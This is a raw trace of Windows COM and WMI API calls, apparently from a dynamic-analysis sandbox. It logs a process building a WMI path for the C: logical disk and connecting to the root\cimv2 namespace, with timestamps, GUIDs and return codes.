WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e994 | out: ppvObject=0x8f6e994*=0x6030a20) returned 0x0 [0214.672] WbemDefPath:IUnknown:Release (This=0x60271c0) returned 0x0 [0214.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5b4 | out: ppvObject=0x8f6e5b4*=0x6030a20) returned 0x0 [0214.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e570 | out: ppvObject=0x8f6e570*=0x0) returned 0x80004002 [0214.672] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0214.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0214.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de7c | out: ppvObject=0x8f6de7c*=0x0) returned 0x80004002 [0214.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de88 | out: ppvObject=0x8f6de88*=0xbdf1e0) returned 0x0 [0214.672] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf1e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de90 | out: pCid=0x8f6de90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.672] WbemDefPath:IUnknown:Release (This=0xbdf1e0) returned 0x3 [0214.672] CoGetContextToken (in: pToken=0x8f6dee8 | out: pToken=0x8f6dee8) returned 0x0 [0214.672] CoGetContextToken (in: pToken=0x8f6e2f0 | out: pToken=0x8f6e2f0) returned 0x0 [0214.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e380 | out: ppvObject=0x8f6e380*=0x0) returned 0x80004002 [0214.672] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0214.672] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x1 [0214.672] CoGetContextToken (in: pToken=0x8f6ec78 | out: pToken=0x8f6ec78) returned 0x0 [0214.672] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0214.672] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030a20, riid=0x8f6eca8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6eca4 | out: ppvObject=0x8f6eca4*=0x6030a20) returned 0x0 [0214.673] WbemDefPath:IUnknown:AddRef (This=0x6030a20) returned 0x3 [0214.673] WbemDefPath:IUnknown:Release (This=0x6030a20) returned 0x2 [0214.673] WbemDefPath:IWbemPath:SetText (This=0x6030a20, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6ee2c | out: puCount=0x8f6ee2c*=0x0) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee28*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee28*=0x20, pszText=0x0) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetText (in: This=0x6030a20, lFlags=2, puBuffLength=0x8f6ee28*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee28*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x8f6ee34 | out: puResponse=0x8f6ee34*=0xc19) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6ee2c | out: puCount=0x8f6ee2c*=0x0) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x8f6ee34 | out: puResponse=0x8f6ee34*=0xc19) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030a20, uRequestedInfo=0x0, puResponse=0x8f6ee34 | out: puResponse=0x8f6ee34*=0xc19) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6edac | out: puCount=0x8f6edac*=0x0) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ed98 | out: puCount=0x8f6ed98*=0x2) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ed94*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed94*=0xf, pszText=0x0) returned 0x0 [0214.673] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ed94*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed94*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.673] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed48 | out: ppv=0x8f6ed48*=0xb51e34) returned 0x0 [0214.673] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed40 | out: pAptType=0x8f6ed40*=1) returned 0x0 [0214.673] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed44 | out: ppvObject=0x8f6ed44*=0x0) returned 0x80004002 [0214.673] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.674] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e6b0 | out: ppv=0x8f6e6b0*=0x6027230) returned 0x0 [0214.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027230, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e8c8 | out: ppvObject=0x8f6e8c8*=0x0) returned 0x80004002 [0214.674] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027230, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e8dc | out: ppvObject=0x8f6e8dc*=0x6030b00) returned 0x0 [0214.674] WbemDefPath:IUnknown:Release (This=0x6027230) returned 0x0 [0214.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e4fc | out: ppvObject=0x8f6e4fc*=0x6030b00) returned 0x0 [0214.674] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e4b8 | out: ppvObject=0x8f6e4b8*=0x0) returned 0x80004002 [0214.675] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0214.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0214.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6ddc4 | out: ppvObject=0x8f6ddc4*=0x0) returned 0x80004002 [0214.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ddd0 | out: ppvObject=0x8f6ddd0*=0xbdeea0) returned 0x0 [0214.675] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdeea0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6ddd8 | out: pCid=0x8f6ddd8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.675] WbemDefPath:IUnknown:Release (This=0xbdeea0) returned 0x3 [0214.675] CoGetContextToken (in: pToken=0x8f6de30 | out: pToken=0x8f6de30) returned 0x0 [0214.675] CoGetContextToken (in: pToken=0x8f6e238 | out: pToken=0x8f6e238) returned 0x0 [0214.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e2c8 | out: ppvObject=0x8f6e2c8*=0x0) returned 0x80004002 [0214.675] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0214.675] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0214.675] CoGetContextToken (in: pToken=0x8f6ebc0 | out: pToken=0x8f6ebc0) returned 0x0 [0214.675] CoGetContextToken (in: pToken=0x8f6eb20 | out: pToken=0x8f6eb20) returned 0x0 [0214.675] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x8f6ebf0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ebec | out: ppvObject=0x8f6ebec*=0x6030b00) returned 0x0 [0214.675] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0214.675] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0214.675] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0214.675] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x8f6ed70 | out: puCount=0x8f6ed70*=0x2) returned 0x0 [0214.675] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x8f6ed6c*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed6c*=0xf, pszText=0x0) returned 0x0 [0214.675] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=4, puBuffLength=0x8f6ed6c*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed6c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.675] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed70 | out: ppv=0x8f6ed70*=0xb51e34) returned 0x0 [0214.676] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed68 | out: pAptType=0x8f6ed68*=1) returned 0x0 [0214.676] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed6c | out: ppvObject=0x8f6ed6c*=0x0) returned 0x80004002 [0214.676] IUnknown:Release (This=0xb51e34) returned 0x1 [0214.676] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e990 | out: ppv=0x8f6e990*=0x601f318) returned 0x0 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x601f318, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6eba8 | out: ppvObject=0x8f6eba8*=0x0) returned 0x80004002 [0214.677] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f318, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ebbc | out: ppvObject=0x8f6ebbc*=0x6027270) returned 0x0 [0214.677] WbemLocator:IUnknown:Release (This=0x601f318) returned 0x0 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e7dc | out: ppvObject=0x8f6e7dc*=0x6027270) returned 0x0 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e798 | out: ppvObject=0x8f6e798*=0x0) returned 0x80004002 [0214.677] WbemLocator:IUnknown:AddRef (This=0x6027270) returned 0x3 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0a4 | out: ppvObject=0x8f6e0a4*=0x0) returned 0x80004002 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e0b0 | out: ppvObject=0x8f6e0b0*=0x0) returned 0x80004002 [0214.677] CoGetContextToken (in: pToken=0x8f6e110 | out: pToken=0x8f6e110) returned 0x0 [0214.677] CoGetContextToken (in: pToken=0x8f6e518 | out: pToken=0x8f6e518) returned 0x0 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5a8 | out: ppvObject=0x8f6e5a8*=0x0) returned 0x80004002 [0214.677] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x2 [0214.677] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x1 [0214.677] CoGetContextToken (in: pToken=0x8f6eb88 | out: pToken=0x8f6eb88) returned 0x0 [0214.677] CoGetContextToken (in: pToken=0x8f6eae8 | out: pToken=0x8f6eae8) returned 0x0 [0214.677] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x8f6ebb8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ebb4 | out: ppvObject=0x8f6ebb4*=0x6027270) returned 0x0 [0214.677] WbemLocator:IUnknown:AddRef (This=0x6027270) returned 0x3 [0214.677] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x2 [0214.678] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x8f6ed4c | out: puCount=0x8f6ed4c*=0x2) returned 0x0 [0214.678] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=8, puBuffLength=0x8f6ed48*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed48*=0xf, pszText=0x0) returned 0x0 [0214.678] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=8, puBuffLength=0x8f6ed48*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed48*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.678] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec24 | out: ppv=0x8f6ec24*=0x60274f0) returned 0x0 [0214.678] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60274f0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ecb8 | out: ppNamespace=0x8f6ecb8*=0x60332c4) returned 0x0 [0215.018] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb54 | out: ppvObject=0x8f6eb54*=0xb5b134) returned 0x0 [0215.018] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b134, pProxy=0x60332c4, pAuthnSvc=0x8f6eba4, pAuthzSvc=0x8f6eba0, pServerPrincName=0x8f6eb98, pAuthnLevel=0x8f6eb9c, pImpLevel=0x8f6eb8c, pAuthInfo=0x8f6eb90, pCapabilites=0x8f6eb94 | out: pAuthnSvc=0x8f6eba4*=0xa, pAuthzSvc=0x8f6eba0*=0x0, pServerPrincName=0x8f6eb98, pAuthnLevel=0x8f6eb9c*=0x6, pImpLevel=0x8f6eb8c*=0x2, pAuthInfo=0x8f6eb90, pCapabilites=0x8f6eb94*=0x1) returned 0x0 [0215.018] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x1 [0215.018] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb48 | out: ppvObject=0x8f6eb48*=0xb5b154) returned 0x0 [0215.018] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb44 | out: ppvObject=0x8f6eb44*=0xb5b134) returned 0x0 [0215.018] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b134, pProxy=0x60332c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0215.019] WbemLocator:IUnknown:Release (This=0xb5b134) returned 0x2 [0215.019] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x1 [0215.019] CoTaskMemFree (pv=0xbd4a68) [0215.019] WbemLocator:IUnknown:Release (This=0x60274f0) returned 0x0 [0215.019] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e744 | out: ppvObject=0x8f6e744*=0xb5b154) returned 0x0 [0215.019] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e700 | out: ppvObject=0x8f6e700*=0x0) returned 0x80004002 [0215.019] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e51c | out: ppvObject=0x8f6e51c*=0x0) returned 0x80004002 [0215.020] WbemLocator:IUnknown:AddRef (This=0xb5b154) returned 0x3 [0215.020] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0215.020] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e00c | out: ppvObject=0x8f6e00c*=0x0) returned 0x80004002 [0215.021] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e018 | out: ppvObject=0x8f6e018*=0xb5b0b4) returned 0x0 [0215.021] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b0b4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e020 | out: pCid=0x8f6e020*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0215.021] WbemLocator:IUnknown:Release (This=0xb5b0b4) returned 0x3 [0215.021] CoGetContextToken (in: pToken=0x8f6e078 | out: pToken=0x8f6e078) returned 0x0 [0215.021] CoGetContextToken (in: pToken=0x8f6e480 | out: pToken=0x8f6e480) returned 0x0 [0215.021] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e510 | out: ppvObject=0x8f6e510*=0xb5b13c) returned 0x0 [0215.021] WbemLocator:IRpcOptions:Query (in: This=0xb5b13c, pPrx=0xb5b154, dwProperty=2, pdwValue=0x8f6e538 | out: pdwValue=0x8f6e538) returned 0x80004002 [0215.021] WbemLocator:IUnknown:Release (This=0xb5b13c) returned 0x3 [0215.021] WbemLocator:IUnknown:Release (This=0xb5b154) returned 0x2 [0215.021] CoGetContextToken (in: pToken=0x8f6ea58 | out: pToken=0x8f6ea58) returned 0x0 [0215.021] CoGetContextToken (in: pToken=0x8f6e9b8 | out: pToken=0x8f6e9b8) returned 0x0 [0215.021] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b154, riid=0x8f6ea88*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ea84 | out: ppvObject=0x8f6ea84*=0x60332c4) returned 0x0 [0215.021] WbemLocator:IUnknown:AddRef (This=0x60332c4) returned 0x4 [0215.021] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x3 [0215.021] WbemLocator:IUnknown:Release (This=0x60332c4) returned 0x2 [0215.021] SysStringLen (param_1=0x0) returned 0x0 [0215.022] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030a20, puCount=0x8f6ee1c | out: puCount=0x8f6ee1c*=0x0) returned 0x0 